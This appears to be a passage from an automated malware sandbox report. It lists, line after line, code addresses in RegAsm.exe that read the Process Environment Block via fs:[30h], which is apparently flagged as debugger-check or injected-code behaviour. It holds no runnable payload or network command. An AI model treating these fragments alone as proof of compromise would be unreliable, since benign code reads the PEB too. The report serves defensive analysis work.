          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h]10_2_02EFA3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h]10_2_02EF83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h]10_2_02EF83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h]10_2_02EF83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h]10_2_02EF83C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAC3CD mov eax, dword ptr fs:[00000030h]10_2_02FAC3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F763C0 mov eax, dword ptr fs:[00000030h]10_2_02F763C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F233A0 mov eax, dword ptr fs:[00000030h]10_2_02F233A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F233A0 mov eax, dword ptr fs:[00000030h]10_2_02F233A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F133A5 mov eax, dword ptr fs:[00000030h]10_2_02F133A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC539D mov eax, dword ptr fs:[00000030h]10_2_02FC539D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEE388 mov eax, dword ptr fs:[00000030h]10_2_02EEE388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEE388 mov eax, dword ptr fs:[00000030h]10_2_02EEE388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEE388 mov eax, dword ptr fs:[00000030h]10_2_02EEE388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F4739A mov eax, dword ptr fs:[00000030h]10_2_02F4739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F4739A mov eax, dword ptr fs:[00000030h]10_2_02F4739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE8397 mov eax, dword ptr fs:[00000030h]10_2_02EE8397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE8397 mov eax, dword ptr fs:[00000030h]10_2_02EE8397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE8397 mov eax, dword ptr fs:[00000030h]10_2_02EE8397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1438F mov eax, dword ptr fs:[00000030h]10_2_02F1438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1438F mov eax, dword ptr fs:[00000030h]10_2_02F1438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F9437C mov eax, dword ptr fs:[00000030h]10_2_02F9437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAF367 mov eax, dword ptr fs:[00000030h]10_2_02FAF367
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF7370 mov eax, dword ptr fs:[00000030h]10_2_02EF7370
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF7370 mov eax, dword ptr fs:[00000030h]10_2_02EF7370
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF7370 mov eax, dword ptr fs:[00000030h]10_2_02EF7370
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EED34C mov eax, dword ptr fs:[00000030h]10_2_02EED34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EED34C mov eax, dword ptr fs:[00000030h]10_2_02EED34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBA352 mov eax, dword ptr fs:[00000030h]10_2_02FBA352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h]10_2_02F7035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h]10_2_02F7035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h]10_2_02F7035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7035C mov ecx, dword ptr fs:[00000030h]10_2_02F7035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h]10_2_02F7035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h]10_2_02F7035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC5341 mov eax, dword ptr fs:[00000030h]10_2_02FC5341
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE9353 mov eax, dword ptr fs:[00000030h]10_2_02EE9353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE9353 mov eax, dword ptr fs:[00000030h]10_2_02EE9353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h]10_2_02F72349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB132D mov eax, dword ptr fs:[00000030h]10_2_02FB132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB132D mov eax, dword ptr fs:[00000030h]10_2_02FB132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1F32A mov eax, dword ptr fs:[00000030h]10_2_02F1F32A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EE7330 mov eax, dword ptr fs:[00000030h]10_2_02EE7330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F10310 mov ecx, dword ptr fs:[00000030h]10_2_02F10310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2A30B mov eax, dword ptr fs:[00000030h]10_2_02F2A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2A30B mov eax, dword ptr fs:[00000030h]10_2_02F2A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2A30B mov eax, dword ptr fs:[00000030h]10_2_02F2A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7930B mov eax, dword ptr fs:[00000030h]10_2_02F7930B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7930B mov eax, dword ptr fs:[00000030h]10_2_02F7930B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7930B mov eax, dword ptr fs:[00000030h]10_2_02F7930B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEC310 mov ecx, dword ptr fs:[00000030h]10_2_02EEC310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F320F0 mov ecx, dword ptr fs:[00000030h]10_2_02F320F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF80E9 mov eax, dword ptr fs:[00000030h]10_2_02EF80E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEA0E3 mov ecx, dword ptr fs:[00000030h]10_2_02EEA0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F150E4 mov eax, dword ptr fs:[00000030h]10_2_02F150E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F150E4 mov ecx, dword ptr fs:[00000030h]10_2_02F150E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F760E0 mov eax, dword ptr fs:[00000030h]10_2_02F760E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEC0F0 mov eax, dword ptr fs:[00000030h]10_2_02EEC0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC50D9 mov eax, dword ptr fs:[00000030h]10_2_02FC50D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F720DE mov eax, dword ptr fs:[00000030h]10_2_02F720DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F190DB mov eax, dword ptr fs:[00000030h]10_2_02F190DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h]10_2_02F070C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6D0C0 mov eax, dword ptr fs:[00000030h]10_2_02F6D0C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6D0C0 mov eax, dword ptr fs:[00000030h]10_2_02F6D0C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB60B8 mov eax, dword ptr fs:[00000030h]10_2_02FB60B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB60B8 mov ecx, dword ptr fs:[00000030h]10_2_02FB60B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F880A8 mov eax, dword ptr fs:[00000030h]10_2_02F880A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1D090 mov eax, dword ptr fs:[00000030h]10_2_02F1D090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1D090 mov eax, dword ptr fs:[00000030h]10_2_02F1D090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EED08D mov eax, dword ptr fs:[00000030h]10_2_02EED08D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF208A mov eax, dword ptr fs:[00000030h]10_2_02EF208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2909C mov eax, dword ptr fs:[00000030h]10_2_02F2909C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7D080 mov eax, dword ptr fs:[00000030h]10_2_02F7D080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7D080 mov eax, dword ptr fs:[00000030h]10_2_02F7D080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF5096 mov eax, dword ptr fs:[00000030h]10_2_02EF5096
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov ecx, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h]10_2_02F01070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1C073 mov eax, dword ptr fs:[00000030h]10_2_02F1C073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6D070 mov ecx, dword ptr fs:[00000030h]10_2_02F6D070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7106E mov eax, dword ptr fs:[00000030h]10_2_02F7106E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC5060 mov eax, dword ptr fs:[00000030h]10_2_02FC5060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1B052 mov eax, dword ptr fs:[00000030h]10_2_02F1B052
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F9705E mov ebx, dword ptr fs:[00000030h]10_2_02F9705E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F9705E mov eax, dword ptr fs:[00000030h]10_2_02F9705E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F76050 mov eax, dword ptr fs:[00000030h]10_2_02F76050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF2050 mov eax, dword ptr fs:[00000030h]10_2_02EF2050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h]10_2_02FB903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h]10_2_02FB903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h]10_2_02FB903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h]10_2_02FB903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEA020 mov eax, dword ptr fs:[00000030h]10_2_02EEA020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EEC020 mov eax, dword ptr fs:[00000030h]10_2_02EEC020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0E016 mov eax, dword ptr fs:[00000030h]10_2_02F0E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0E016 mov eax, dword ptr fs:[00000030h]10_2_02F0E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0E016 mov eax, dword ptr fs:[00000030h]10_2_02F0E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0E016 mov eax, dword ptr fs:[00000030h]10_2_02F0E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F74000 mov ecx, dword ptr fs:[00000030h]10_2_02F74000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F971F9 mov esi, dword ptr fs:[00000030h]10_2_02F971F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF51ED mov eax, dword ptr fs:[00000030h]10_2_02EF51ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F201F8 mov eax, dword ptr fs:[00000030h]10_2_02F201F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC61E5 mov eax, dword ptr fs:[00000030h]10_2_02FC61E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F151EF mov eax, dword ptr fs:[00000030h]10_2_02F151EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2D1D0 mov eax, dword ptr fs:[00000030h]10_2_02F2D1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F2D1D0 mov ecx, dword ptr fs:[00000030h]10_2_02F2D1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6E1D0 mov eax, dword ptr fs:[00000030h]10_2_02F6E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6E1D0 mov eax, dword ptr fs:[00000030h]10_2_02F6E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6E1D0 mov ecx, dword ptr fs:[00000030h]10_2_02F6E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6E1D0 mov eax, dword ptr fs:[00000030h]10_2_02F6E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F6E1D0 mov eax, dword ptr fs:[00000030h]10_2_02F6E1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FC51CB mov eax, dword ptr fs:[00000030h]10_2_02FC51CB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB61C3 mov eax, dword ptr fs:[00000030h]10_2_02FB61C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB61C3 mov eax, dword ptr fs:[00000030h]10_2_02FB61C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0B1B0 mov eax, dword ptr fs:[00000030h]10_2_02F0B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA11A4 mov eax, dword ptr fs:[00000030h]10_2_02FA11A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA11A4 mov eax, dword ptr fs:[00000030h]10_2_02FA11A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA11A4 mov eax, dword ptr fs:[00000030h]10_2_02FA11A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA11A4 mov eax, dword ptr fs:[00000030h]10_2_02FA11A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F47190 mov eax, dword ptr fs:[00000030h]10_2_02F47190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7019F mov eax, dword ptr fs:[00000030h]10_2_02F7019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7019F mov eax, dword ptr fs:[00000030h]10_2_02F7019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7019F mov eax, dword ptr fs:[00000030h]10_2_02F7019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7019F mov eax, dword ptr fs:[00000030h]10_2_02F7019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAC188 mov eax, dword ptr fs:[00000030h]10_2_02FAC188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FAC188 mov eax, dword ptr fs:[00000030h]10_2_02FAC188
